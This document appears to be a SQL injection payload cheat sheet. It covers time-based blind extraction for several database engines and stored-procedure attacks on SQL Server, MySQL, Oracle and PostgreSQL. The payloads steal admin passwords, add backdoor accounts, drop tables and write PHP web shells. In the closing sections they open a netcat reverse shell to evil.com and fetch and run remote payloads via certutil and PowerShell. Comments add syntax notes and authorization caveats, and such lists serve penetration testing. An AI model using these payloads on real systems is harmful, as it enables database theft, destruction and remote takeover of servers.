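# T-SQL needs no separator between statements, so "' WAITFOR ..." works directly after the
# closing quote; the IF forms give a TRUE/FALSE pair for calibration.
' WAITFOR DELAY '00:00:05'--
'; WAITFOR DELAY '0:0:5'--
' WAITFOR DELAY '00:00:10'--
'; WAITFOR DELAY '0:0:10'--
'; IF (1=1) WAITFOR DELAY '00:00:05'--
'; IF (1=2) WAITFOR DELAY '00:00:05'--
# PostgreSQL time-based injections
' AND 1=(SELECT 1 FROM pg_sleep(5))--
' AND 1=(SELECT 1 FROM pg_sleep(10))--
'; SELECT pg_sleep(5)--
' OR 1=(SELECT 1 FROM pg_sleep(10))--
' AND 1=(SELECT 1 FROM pg_sleep(5)) AND '1'='1
' OR 1=(SELECT 1 FROM pg_sleep(5)) AND 'a'='a
# Oracle time-based injections
# RECEIVE_MESSAGE returns 1 on timeout, so "=1" holds after the delay. DBMS_LOCK.SLEEP is a
# procedure (PL/SQL only) and EXEC is a SQL*Plus client command; the last three lines only
# work where a PL/SQL block can be injected, which application drivers rarely allow.
' AND DBMS_PIPE.RECEIVE_MESSAGE('x', 5)=1--
' OR DBMS_PIPE.RECEIVE_MESSAGE('x', 10)=1--
' AND DBMS_LOCK.SLEEP(5)--
' OR DBMS_LOCK.SLEEP(10)--
'; EXEC DBMS_PIPE.RECEIVE_MESSAGE('x', 5)--
# SQLite time-based injections (using heavy queries)
# SQLite has no sleep(); the delay comes from query cost and is hardware-dependent, so
# calibrate against a baseline. The UNION forms are deduplicated and barely cost anything;
# the CROSS JOIN forms grow as rows^N and can hang the target on a large users table.
' AND (SELECT COUNT(*) FROM (SELECT * FROM sqlite_master UNION SELECT * FROM sqlite_master UNION SELECT * FROM sqlite_master UNION SELECT * FROM sqlite_master UNION SELECT * FROM sqlite_master UNION SELECT * FROM sqlite_master))--
' AND (SELECT COUNT(*) FROM (SELECT * FROM sqlite_master CROSS JOIN sqlite_master CROSS JOIN sqlite_master))--
' AND (SELECT COUNT(*) FROM (SELECT * FROM users CROSS JOIN users CROSS JOIN users CROSS JOIN users CROSS JOIN users))--
# Database name extraction with time delays
' AND SLEEP(IF(ASCII(SUBSTRING((SELECT database()),1,1))>64,5,0))--
' AND 1=(SELECT 1 FROM pg_sleep(CASE WHEN ASCII(SUBSTRING((SELECT current_database()),1,1))>64 THEN 5 ELSE 0 END))--
'; IF (ASCII(SUBSTRING((SELECT db_name()),1,1))>64) WAITFOR DELAY '00:00:05'--
# Table name extraction with time delays
' AND SLEEP(IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_name='users')>0,5,0))--
' AND 1=(SELECT 1 FROM pg_sleep(CASE WHEN (SELECT COUNT(*) FROM information_schema.tables WHERE table_name='users')>0 THEN 5 ELSE 0 END))--
'; IF ((SELECT COUNT(*) FROM information_schema.tables WHERE table_name='users')>0) WAITFOR DELAY '00:00:05'--
# Data extraction with time delays
' AND SLEEP(IF(ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1))>64,5,0))--
' AND 1=(SELECT 1 FROM pg_sleep(CASE WHEN ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1))>64 THEN 5 ELSE 0 END))--
'; IF (ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1))>64) WAITFOR DELAY '00:00:05'--
# Character by character extraction with time
# BENCHMARK must take the condition in its iteration count: hashing 'true' vs 'false' costs
# the same, so an IF() inside MD5() would delay on both branches and leak nothing.
' AND SLEEP(IF(ASCII(SUBSTRING((SELECT database()),1,1))=115,5,0))--
' AND 1=(SELECT 1 FROM pg_sleep(CASE WHEN ASCII(SUBSTRING((SELECT current_database()),1,1))=115 THEN 5 ELSE 0 END))--
' AND BENCHMARK(IF(ASCII(SUBSTRING((SELECT database()),1,1))=115,5000000,0), MD5(1))--
# Conditional time-based queries
' AND SLEEP(IF((SELECT COUNT(*) FROM users)>0,5,0))--
' AND SLEEP(IF((SELECT database())='testdb',5,0))--
' AND 1=(SELECT 1 FROM pg_sleep(CASE WHEN (SELECT COUNT(*) FROM information_schema.tables)>5 THEN 5 ELSE 0 END))--
'; IF ((SELECT COUNT(*) FROM users)>0) WAITFOR DELAY '00:00:05'--
# Heavy query time delays for databases without sleep functions
# Cost — and therefore the delay — scales with table size; the CROSS JOIN form can exhaust the server.
' AND (SELECT COUNT(*) FROM (SELECT * FROM users UNION SELECT * FROM users UNION SELECT * FROM users UNION SELECT * FROM users UNION SELECT * FROM users) AS temp) > 0--
' AND (SELECT COUNT(*) FROM (SELECT * FROM information_schema.tables a CROSS JOIN information_schema.tables b CROSS JOIN information_schema.tables c) AS temp) > 0--
# Multiple time delays for confirmation
# Chaining is unreliable: MySQL SLEEP() returns 0 and AND short-circuits, so the second
# delay typically never runs. Confirm by repeating the single-delay request instead.
' AND SLEEP(5) AND SLEEP(5)--
' AND 1=(SELECT 1 FROM pg_sleep(5)) AND 1=(SELECT 1 FROM pg_sleep(5))--
' WAITFOR DELAY '00:00:05' WAITFOR DELAY '00:00:05'--
' AND BENCHMARK(5000000, MD5(1)) AND BENCHMARK(5000000, MD5(1))--
# Variable time delays for bit extraction
# One request per bit (8 per character) instead of a binary search over the ASCII value.
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 128)=128,5,0))--
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 64)=64,5,0))--
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 32)=32,5,0))--
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 16)=16,5,0))--
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 8)=8,5,0))--
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 4)=4,5,0))--
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 2)=2,5,0))--
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 1)=1,5,0))--
# Time-based data length extraction
' AND SLEEP(IF(LENGTH((SELECT database()))>5,5,0))--
' AND 1=(SELECT 1 FROM pg_sleep(CASE WHEN LENGTH((SELECT current_database()))>5 THEN 5 ELSE 0 END))--
' AND SLEEP(IF(LENGTH((SELECT password FROM users WHERE username='admin'))>10,5,0))--
# Time-based counting queries
' AND SLEEP(IF((SELECT COUNT(*) FROM users)>10,5,0))--
' AND 1=(SELECT 1 FROM pg_sleep(CASE WHEN (SELECT COUNT(*) FROM information_schema.tables)>5 THEN 5 ELSE 0 END))--
'; IF ((SELECT COUNT(*) FROM users)>0) WAITFOR DELAY '00:00:05'--
# Time-based version detection
' AND SLEEP(IF(SUBSTRING(VERSION(),1,1)='5',5,0))--
' AND 1=(SELECT 1 FROM pg_sleep(CASE WHEN SUBSTRING(VERSION(),1,1)='9' THEN 5 ELSE 0 END))--
'; IF (@@VERSION LIKE '%SQL Server%') WAITFOR DELAY '00:00:05'--
# Time-based user privilege detection (MySQL)
# mysql.user is a MySQL table, so the delay function must be SLEEP(), not pg_sleep();
# reading it requires SELECT on the mysql schema.
' AND SLEEP(IF((SELECT COUNT(*) FROM information_schema.user_privileges WHERE grantee LIKE '%admin%')>0,5,0))--
' AND SLEEP(IF((SELECT super_priv FROM mysql.user WHERE user='root')='Y',5,0))--
# Time-based file existence check (MySQL)
# information_schema.files lists InnoDB tablespace files, not OS files; LOAD_FILE() is NULL
# when the file is missing, unreadable by mysqld, or blocked by secure_file_priv / no FILE privilege.
' AND SLEEP(IF((SELECT COUNT(*) FROM information_schema.files WHERE file_name='/etc/passwd')>0,5,0))--
' AND SLEEP(IF(LOAD_FILE('/etc/passwd') IS NOT NULL,5,0))--
# Advanced time-based techniques
' AND SLEEP(IF(ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)) BETWEEN 97 AND 122,5,0))--
' AND 1=(SELECT 1 FROM pg_sleep(CASE WHEN ASCII(SUBSTRING((SELECT current_database()),1,1)) IN (115, 116, 117) THEN 5 ELSE 0 END))--
' AND SLEEP(IF((SELECT database()) LIKE 't%',5,0))--
' AND 1=(SELECT 1 FROM pg_sleep(CASE WHEN (SELECT current_database()) LIKE '%test%' THEN 5 ELSE 0 END))--
# Time-based with mathematical operations
' AND SLEEP(IF((SELECT COUNT(*) FROM users)*2>10,5,0))--
' AND 1=(SELECT 1 FROM pg_sleep(CASE WHEN (SELECT COUNT(*) FROM information_schema.tables)/2>3 THEN 5 ELSE 0 END))--
' AND SLEEP(IF(LENGTH((SELECT database()))*2>10,5,0))--
# Stacked queries with time delays
# EXEC('...') is SQL Server; MySQL has no EXEC — the dynamic-SQL analogue is MariaDB's
# EXECUTE IMMEDIATE (10.1.2+) or PREPARE/EXECUTE (see the stored-procedure collection).
'; SELECT SLEEP(5)--
'; WAITFOR DELAY '00:00:05'--
'; SELECT pg_sleep(5)--
'; EXEC('WAITFOR DELAY ''00:00:05''')--
'; EXECUTE IMMEDIATE 'SELECT SLEEP(5)'--
# Time-based injection with HTTP parameter pollution
# Which duplicate value the server uses is framework-specific; the second copy is the control.
id=1' AND SLEEP(5) &id=2' AND SLEEP(5)--
username=admin' AND SLEEP(5) &username=test' AND SLEEP(5)--
password=' AND SLEEP(5) &password=' AND SLEEP(10)--
# Cookie-based time injection
# Header/cookie values only reach SQL where the application concatenates them (session
# lookup, audit/visitor logging); the delay then shows on that request or a later page view.
Cookie: sessionid=' AND SLEEP(5)--
Cookie: user_id=' OR pg_sleep(5)--
Cookie: auth=' WAITFOR DELAY '00:00:05'--
# User-Agent time injection
User-Agent: ' AND SLEEP(5)--
User-Agent: ' OR pg_sleep(5)--
User-Agent: ' WAITFOR DELAY '00:00:05'--
# Referer time injection
Referer: ' AND SLEEP(5)--
Referer: ' OR pg_sleep(10)--
Referer: ' WAITFOR DELAY '00:00:05'--
# X-Forwarded-For time injection
X-Forwarded-For: ' AND SLEEP(5)--
X-Forwarded-For: ' OR pg_sleep(5)--
X-Forwarded-For: ' WAITFOR DELAY '00:00:05'--
# Error-based time delays (combining error and time)
# As written these only delay: the classic duplicate-entry error needs FLOOR(RAND(0)*2)
# in the grouped expression to force the key collision that leaks VERSION() in the error text.
' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(VERSION(), SLEEP(5)) x FROM information_schema.tables GROUP BY x) a)--
' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(database(), SLEEP(5)) x FROM users GROUP BY x) a)--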
📝 SQL-инъекции хранимых процедур sql
SQL-инъекции через хранимые процедуры - xp_cmdshell, sp_oacreate, файловые операции и расширенное выполнение команд базы данных
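# Stored Procedure SQL Injection Vectors
# SQL injection through stored procedures and database functions
# NOTE: everything in this collection executes code or changes configuration on the
# database host. Use it only inside an authorized, scoped engagement; payloads that
# create OS or database accounts (net user, sp_adduser) leave persistent artefacts
# that must be removed and reported. Prefer a non-persistent proof such as whoami.
# NOTE: xp_cmdshell, sp_OACreate ("Ole Automation Procedures") and OPENROWSET
# ("Ad Hoc Distributed Queries") are disabled by default on SQL Server 2005+; enabling
# them needs sysadmin / ALTER SETTINGS via sp_configure followed by RECONFIGURE.
# SQL Server xp_cmdshell injections
# Documented syntax is EXEC master..xp_cmdshell 'cmd' (see next section); the parenthesised
# form below is what many payload lists carry — if it errors, use the quoted-argument form.
' EXEC xp_cmdshell('dir')--
'; EXEC xp_cmdshell('dir')--
' EXEC xp_cmdshell('net user hacker password /add')--
'; EXEC xp_cmdshell('net user hacker password /add')--
' EXEC xp_cmdshell('ping evil.com')--
'; EXEC xp_cmdshell('ping evil.com')--
' EXEC xp_cmdshell('ipconfig')--
'; EXEC xp_cmdshell('whoami')--
# SQL Server master database procedures
# Enabling xp_cmdshell is a two-step sequence, each followed by RECONFIGURE: the
# 'show advanced options' line first, then the 'xp_cmdshell' line. The two lines
# without RECONFIGURE change the pending value only.
' EXEC master..xp_cmdshell 'dir'--
'; EXEC master..xp_cmdshell 'ping evil.com'--
' EXEC master..sp_configure 'show advanced options', 1--
'; EXEC master..sp_configure 'show advanced options', 1; RECONFIGURE;--
' EXEC master..sp_configure 'xp_cmdshell', 1--
'; EXEC master..sp_configure 'xp_cmdshell', 1; RECONFIGURE;--
# SQL Server sp_oacreate injections
# Needs 'Ole Automation Procedures' enabled (sp_configure) and sysadmin; runs the command
# as the SQL Server service account, with no output returned to the query.
' DECLARE @shell INT EXEC sp_oacreate 'wscript.shell', @shell OUTPUT EXEC sp_oamethod @shell, 'run', NULL, 'cmd.exe /c dir'--
'; DECLARE @shell INT EXEC sp_oacreate 'wscript.shell', @shell OUTPUT EXEC sp_oamethod @shell, 'run', NULL, 'cmd.exe /c ping evil.com'--
# SQL Server sp_adduser injections
# sp_adduser (deprecated) maps an EXISTING login to a database user: its arguments are
# loginame and name_in_db — the second value is a user name, not a password, so these
# lines do not create credentials. A login is created with CREATE LOGIN ... WITH PASSWORD.
' EXEC sp_adduser 'hacker', 'password'--
'; EXEC sp_adduser 'admin', 'password123'--
# MySQL stored procedure injections
# MySQL has no built-in shell(): CALL shell(...) presumes a user-defined function
# (e.g. lib_mysqludf_sys) already installed by someone with FILE + CREATE FUNCTION rights.
# EXECUTE IMMEDIATE is MariaDB (10.1.2+) / Oracle PL/SQL, not MySQL, and takes a complete statement.
' CALL shell('dir')--
'; CALL shell('ls -la')--
' DO SLEEP(5)--
'; DO SLEEP(10)--
'; EXECUTE IMMEDIATE 'SELECT SLEEP(5)'--
# Oracle stored procedure injections
# EXEC is a SQL*Plus client command, not SQL, and Oracle drivers generally do not run
# stacked statements: inside an injected query call a function within the condition,
# e.g. ' AND DBMS_PIPE.RECEIVE_MESSAGE('x',5)=1--. DBMS_LOCK.SLEEP is a procedure and
# needs a PL/SQL block. DBMS_SQLHASH exposes GETHASH(sqltext, digest_type), not HASH —
# verify against the target version before relying on that line.
' EXEC DBMS_PIPE.RECEIVE_MESSAGE('x', 5)--
'; EXEC DBMS_PIPE.RECEIVE_MESSAGE('x', 10)--
' EXEC DBMS_LOCK.SLEEP(5)--
'; EXEC DBMS_LOCK.SLEEP(10)--
' EXEC DBMS_SQLHASH.HASH('test')--
'; EXEC DBMS_RANDOM.STRING('a', 10)--
# PostgreSQL stored procedure injections
# Stacked statements need ";" (most PostgreSQL drivers accept multi-statement strings).
# SQL-level EXECUTE runs a prepared statement *by name*; EXECUTE 'string' is PL/pgSQL and
# only works inside a DO block. dbms_pipe exists only with the orafce extension installed.
'; SELECT pg_sleep(5)--
'; SELECT pg_sleep(10)--
'; DO $$ BEGIN EXECUTE 'SELECT pg_sleep(5)'; END $$--
'; DO $$ BEGIN EXECUTE 'SELECT pg_sleep(10)'; END $$--
'; SELECT dbms_pipe.receive_message('x', 5)--
# INTO OUTFILE injections (MySQL)
# Needs the FILE privilege, a secure_file_priv that permits the path (modern defaults
# restrict or disable it), a directory writable by the mysqld OS user and a web root the
# attacker can later reach. "; UNION" is not a statement — a stacked write is "; SELECT ... INTO OUTFILE".
' UNION SELECT 1,2,3 INTO OUTFILE '/var/www/html/shell.php'--
'; SELECT NULL, '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/cmd.php'--
' UNION SELECT NULL, NULL, NULL INTO OUTFILE '/tmp/test.txt'--
'; SELECT * FROM users INTO OUTFILE '/var/www/html/users.txt'--
# INTO DUMPFILE injections (MySQL)
# DUMPFILE writes a single row raw, without column/line terminators or escaping (binary-safe).
' UNION SELECT 1,2 INTO DUMPFILE '/var/www/html/test.txt'--
'; SELECT '<?php phpinfo(); ?>' INTO DUMPFILE '/var/www/html/info.php'--
# LOAD_FILE injections (MySQL)
# Returns NULL when the file is unreadable by the mysqld OS user (/etc/shadow normally is),
# blocked by secure_file_priv, or the FILE privilege is missing.
' UNION SELECT LOAD_FILE('/etc/passwd')--
' UNION SELECT LOAD_FILE('C:/Windows/win.ini')--
' UNION SELECT LOAD_FILE('/var/www/html/config.php')--
'; SELECT LOAD_FILE('/etc/shadow')--
# BCP utility injections (SQL Server)
# Runs through xp_cmdshell; -T uses the service account's Windows credentials, so it only
# works where that account can log in to the instance.
' EXEC master..xp_cmdshell 'bcp "SELECT * FROM users" queryout C:\\Users\\Public\\users.txt -c -T'--
'; EXEC master..xp_cmdshell 'bcp database.dbo.users queryout C:\\Users\\Public\\users.txt -c -T'--
# OPENROWSET injections (SQL Server)
# Needs 'Ad Hoc Distributed Queries' enabled. The first line makes the database server
# open an outbound connection to an attacker host (out-of-band channel, also exposes the
# service account's credentials to that host); the second needs the Jet OLE DB provider installed.
' UNION SELECT * FROM OPENROWSET('SQLOLEDB', 'Server=evil.com;Trusted_Connection=yes;', 'SELECT * FROM users')--
'; SELECT * FROM OPENROWSET('Microsoft.Jet.OLEDB.4.0', 'C:\\Windows\\system32\\drivers\\etc\\hosts', 'SELECT * FROM hosts')--
# OPENJSON injections (SQL Server 2016+)
' SELECT * FROM OPENJSON((SELECT * FROM users FOR JSON PATH))--
'; SELECT * FROM OPENJSON((SELECT username, password FROM users FOR JSON PATH))--
# EXECUTE with dynamic SQL
# Inside an EXEC('...') string a literal quote is written as two quotes: ''admin''.
' EXEC('SELECT * FROM users')--
'; EXEC('SELECT * FROM admins WHERE username=''admin''')--
' EXEC('SELECT password FROM users WHERE username=''admin''')--
'; EXEC('DROP TABLE users')--
# EXECUTE with user input
# These two are the *vulnerable server-side patterns*, not payloads: the first escapes quotes
# with REPLACE (still fragile — truncation of the built string, and numeric or identifier
# positions are not protected), the second concatenates @input unescaped. Use sp_executesql
# with typed parameters (next section) instead of either.
'; EXEC('SELECT * FROM users WHERE username=''' + REPLACE(@input, '''', '''''') + '''')--
'; DECLARE @sql NVARCHAR(1000); SET @sql = 'SELECT * FROM users WHERE username=''' + @input + ''''; EXEC(@sql)--
# sp_executesql injections (SQL Server)
# With a typed parameter list (@name, @id) sp_executesql is the parameterized, injection-safe
# way to run dynamic SQL; it is only unsafe when user input has already been concatenated
# into the N'...' statement text.
' EXEC sp_executesql N'SELECT * FROM users WHERE username = @name', N'@name VARCHAR(100)', @name = 'admin'--
'; EXEC sp_executesql N'SELECT * FROM users'--
' EXEC sp_executesql N'DELETE FROM users WHERE id = @id', N'@id INT', @id = 1--
# MySQL EXECUTE with prepared statements
# The first line concatenates @input into the statement text before PREPARE, which is
# still injectable. The safe form binds a placeholder:
#   PREPARE stmt FROM 'SELECT * FROM users WHERE username = ?'; EXECUTE stmt USING @input;
' SET @sql = CONCAT('SELECT * FROM users WHERE username = ''', @input, ''''); PREPARE stmt FROM @sql; EXECUTE stmt;--
'; SET @sql = 'SELECT * FROM users'; PREPARE stmt FROM @sql; EXECUTE stmt; DEALLOCATE PREPARE stmt;--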
# PostgreSQL EXECUTE with dynamic queries
' EXECUTE 'SELECT * FROM users WHERE username = $1' USING 'admin'--
'; EXECUTE 'SELECT * FROM users'--
' DO $$ BEGIN EXECUTE 'SELECT * FROM users WHERE username = ' || quote_literal($1) USING 'admin'; END $$;--
# Oracle EXECUTE IMMEDIATE
' EXECUTE IMMEDIATE 'SELECT * FROM users WHERE username = ''admin'''--
'; EXECUTE IMMEDIATE 'DROP TABLE users'--
' BEGIN EXECUTE IMMEDIATE 'SELECT password FROM users WHERE username = :name' USING 'admin'; END;--
# Database link injections (Oracle)
' UNION SELECT * FROM [email protected]
'; SELECT * FROM users@remote_db--
' INSERT INTO [email protected] VALUES ('hacker', 'password')--
'; DELETE FROM users@remote_db WHERE username='admin'--
# Database link injections (PostgreSQL)
' SELECT * FROM dblink('host=evil.com user=hacker password=secret', 'SELECT * FROM users') AS t1(id INT, username VARCHAR, password VARCHAR)--
'; SELECT * FROM postgres_fdw('SELECT * FROM users')--
# Database link injections (SQL Server)
' SELECT * FROM OPENROWSET('SQLNCLI', 'Server=evil.com;Trusted_Connection=yes;', 'SELECT * FROM users')--
'; SELECT * FROM OPENDATASOURCE('SQLNCLI', 'Data Source=evil.com;Integrated Security=SSPI').database.dbo.users--
# Bulk insert injections (SQL Server)
' BULK INSERT users FROM 'C:\\Users\\Public\\users.txt'--
'; BULK INSERT admins FROM 'C:\\Users\\Public\\admins.txt' WITH (FIELDTERMINATOR = ',')--
# SQL injection with IF statements in stored procedures
'; IF EXISTS(SELECT * FROM users WHERE username='admin') DROP TABLE users--
'; IF (SELECT COUNT(*) FROM users) > 0 DROP TABLE users--
'; IF @condition = 'true' BEGIN DROP TABLE users END--
# SQL injection with WHILE loops in stored procedures
'; WHILE EXISTS(SELECT * FROM users) BEGIN DELETE TOP (1) FROM users END--
'; DECLARE @i INT = 1; WHILE @i <= 10 BEGIN INSERT INTO logs (message) VALUES ('test'); SET @i = @i + 1; END--
# SQL injection with CASE statements in stored procedures
'; SELECT CASE WHEN (SELECT COUNT(*) FROM users) > 0 THEN 'true' ELSE 'false' END--
'; UPDATE users SET password = CASE WHEN username = 'admin' THEN 'newpass' ELSE password END--
# SQL injection with CURSOR in stored procedures
'; DECLARE cursor_users CURSOR FOR SELECT username FROM users; OPEN cursor_users; FETCH NEXT FROM cursor_users; CLOSE cursor_users; DEALLOCATE cursor_users;--
# SQL injection with TRANSACTION in stored procedures
'; BEGIN TRANSACTION; DROP TABLE users; COMMIT;--
'; BEGIN TRAN; UPDATE users SET password = 'hacked'; ROLLBACK;--
# SQL injection with TRY/CATCH in stored procedures
'; BEGIN TRY; DROP TABLE users; END TRY; BEGIN CATCH; SELECT ERROR_MESSAGE(); END CATCH;--
# xp_servicecontrol injections (SQL Server)
' EXEC xp_servicecontrol 'start', 'Schedule'--
'; EXEC master..xp_servicecontrol 'start', 'mssearch'--
# xp_regread injections (SQL Server)
' EXEC xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum', '0'--
'; EXEC master..xp_regread 'HKEY_LOCAL_MACHINE', 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion', 'ProductName'--
# xp_replwritetovarbin with payload (SQL Server)
' DECLARE @data VARCHAR(8000); SELECT @data = 0x44005700...; EXEC xp_replwritetovarbin @data--
# sp_makewebtask injections (SQL Server 2000)
' EXEC sp_makewebtask 'C:\\Inetpub\\wwwroot\\shell.php', 'SELECT "<%=Server.CreateObject(""WScript.Shell"").Exec(""cmd.exe /c dir"")%>"'--
'; EXEC sp_makewebtask '\\evil.com\\share\\shell.php', 'SELECT "<?php system($_GET[""cmd""]); ?>"'--
# xp_sendmail injections (SQL Server)
' EXEC xp_sendmail @recipients = '[email protected]', @message = 'Database compromised'--
'; EXEC master..xp_sendmail @recipients = '[email protected]', @subject = 'SQL Injection Success', @message = (SELECT * FROM users FOR XML PATH)--
# MySQL CREATE FUNCTION injections
'; CREATE FUNCTION shell() RETURNS INT SONAME 'lib_mysqludf_sys.so'--
'; CREATE FUNCTION do_system RETURNS INTEGER SONAME 'lib_mysqludf_sys.so'; SELECT do_system('id');--
# MySQL UDF injection
'; CREATE UDF FUNCTION do_system RETURNS INTEGER SONAME 'lib_mysqludf_sys.so';--
'; SELECT do_system('nc -e /bin/sh evil.com 4444');--
# Advanced stored procedure payload execution
'; EXEC master..xp_cmdshell 'echo ^<?php system($_GET["cmd"]); ?^> > C:\\Inetpub\\wwwroot\\cmd.php'--
'; EXEC master..xp_cmdshell 'certutil -urlcache -split -f "http://evil.com/shell.exe" C:\\Users\\Public\\shell.exe && C:\\Users\\Public\\shell.exe'--
'; DECLARE @cmd VARCHAR(1000); SET @cmd = 'powershell -c "IEX (New-Object Net.WebClient).DownloadString(''http://evil.com/payload.ps1'')"'; EXEC master..xp_cmdshell @cmd;--